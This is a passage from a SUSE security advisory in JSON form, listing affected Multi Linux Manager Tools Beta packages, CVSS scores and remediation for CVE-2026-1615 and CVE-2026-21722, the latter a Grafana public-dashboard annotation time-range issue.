"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "critical"
}
],
"title": "CVE-2026-1615"
},
{
"cve": "CVE-2026-21722",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-21722"
}
],
"notes": [
{
"category": "general",
"text": "Public dashboards with annotations enabled did not limit their annotation timerange to the locked timerange of the public dashboard. This means one could read the entire history of annotations visible on the specific dashboard, even those outside the locked timerange.\n\nThis did not leak any annotations that would not otherwise be visible on the public dashboard.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-21722",
"url": "https://www.suse.com/security/cve/CVE-2026-21722"
},
{
"category": "external",
"summary": "SUSE Bug 1258136 for CVE-2026-21722",
"url": "https://bugzilla.suse.com/1258136"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
